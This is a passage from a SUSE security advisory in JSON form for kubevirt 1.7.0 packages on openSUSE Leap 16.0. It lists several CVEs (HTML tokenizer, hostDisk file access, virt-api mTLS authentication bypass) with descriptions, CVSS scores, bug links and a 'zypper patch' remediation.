"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc. contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to versions 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failure to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
